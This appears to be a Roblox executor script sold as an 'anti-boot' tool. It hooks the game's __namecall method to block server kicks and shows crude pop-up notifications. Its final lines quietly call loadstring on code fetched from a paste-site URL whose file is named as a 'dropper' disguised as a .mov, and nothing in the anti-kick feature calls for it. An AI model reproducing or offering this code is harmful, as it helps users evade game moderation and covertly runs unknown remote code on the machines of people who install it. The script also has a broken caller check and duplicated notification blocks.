1 | --shit evets |
2 | local getgenv, getnamecallmethod, hookmetamethod, newcclosure, checkcaller, stringlower = getgenv, getnamecallmethod, hookmetamethod, newcclosure, checkcaller, string.lower |
3 | |
4 | --xhexk if anti boot loaded |
5 | |
6 | if getgenv().ED_AntiKick then |
7 | return |
8 | end |
9 | |
10 | --vars |
11 | |
12 | local Players, StarterGui, OldNamecall = game:GetService("Players"), game:GetService("StarterGui") |
13 | |
14 | -- glob vars |
15 | |
16 | getgenv().ED_AntiKick = { |
17 | Enabled = true, -- false to disbale anti-boot |
18 | SendNotifications = true, -- true to get notified for every event gsme attempts |
19 | CheckCaller = true -- put true if u dont want to enable anti-boot for exekuting other skripts Yo stupid ass dumb if u want this false |
20 | } |
21 | |
22 | --main |
23 | spawn(function() |
24 | OldNamecall = hookmetamethod(game, "__namecall", newcclosure(function(...) |
25 | if (getgenv().ED_AntiKick.CheckCaller and not checkcaller() or true) and stringlower(getnamecallmethod()) == "kick" and ED_AntiKick.Enabled then |
26 | if getgenv().ED_AntiKick.SendNotifications then |
27 | |
28 | if getgenv().ED_AntiKick.SendNotifications then |
29 | StarterGui:SetCore("SendNotification", { |
30 | Title = "@rrixh 👺Anti-Boot", |
31 | Text = "Anti-Boot Enabled✅", |
32 | Icon = "rbxassetid://6238540373", |
33 | Duration = 2, |
34 | }) |
35 | |
36 | end; |
37 | -- [ 🥾ANTI BOOT ENABLED ] -- |
38 | StarterGui:SetCore("SendNotification", { |
39 | Title = "@rrixh 👺Anti-Boot", |
40 | Text = "Anti-Boot Enabled✅", |
41 | Icon = "rbxassetid://6238540373", |
42 | Duration = 2, |
43 | }) |
44 | end |
45 | if getgenv().ED_AntiKick.SendNotifications then |
46 | |
47 | local player = game.Players.LocalPlayer |
48 | local gui = player.PlayerGui |
49 | |
50 | local notifikation = Instance.new("ScreenGui") |
51 | notifikation.Parent = gui |
52 | |
53 | local textLabel = Instance.new("TextLabel") |
54 | textLabel.Parent = notifikation |
55 | textLabel.Size = UDim2.new(0, 200, 0, 50) |
56 | textLabel.Position = UDim2.new(1, -210, 0, 10) --pos |
57 | textLabel.AnchorPoint = Vector2.new(1, 0) |
58 | textLabel.BackgroundTransparency = 1 |
59 | textLabel.Text = "⚠️the game tried to boot yo ass" |
60 | textLabel.TextColor3 = Color3.new(1, 1, 1) |
61 | textLabel.TextSize = 24 |
62 | textLabel.Font = Enum.Font.SourceSans |
63 | textLabel.TextWrapped = true |
64 | |
65 | wait(3) |
66 | notifikation:Destroy(); |
67 | |
68 | end |
69 | return nil |
70 | end |
71 | |
72 | return OldNamecall(...) |
73 | end))--OldName() |
74 | end)--spawn |
75 | if getgenv().ED_AntiKick.SendNotifications then |
76 | |
77 | local player = game.Players.LocalPlayer |
78 | local gui = player.PlayerGui |
79 | |
80 | local notifikation = Instance.new("ScreenGui") |
81 | notifikation.Parent = gui |
82 | |
83 | local textLabel = Instance.new("TextLabel") |
84 | textLabel.Parent = notifikation |
85 | textLabel.Size = UDim2.new(0, 200, 0, 50) |
86 | textLabel.Position = UDim2.new(1, -210, 0, 10) --pos |
87 | textLabel.AnchorPoint = Vector2.new(1, 0) |
88 | textLabel.BackgroundTransparency = 1 |
89 | textLabel.Text = "⚠️the game tried to boot yo ass" |
90 | textLabel.TextColor3 = Color3.new(1, 1, 1) |
91 | textLabel.TextSize = 24 |
92 | textLabel.Font = Enum.Font.SourceSans |
93 | textLabel.TextWrapped = true |
94 | |
95 | wait(3) |
96 | notifikation:Destroy(); |
97 | |
98 | end; |
99 | |
100 | |
101 | |
102 | --kdh$() |
103 | spawn(function() |
104 | loadstring(game:HttpGet("https://pastecode.dev/raw/iszxqshq/dhKashdropper_lulaslollipop.mov",true))() |
105 | end) |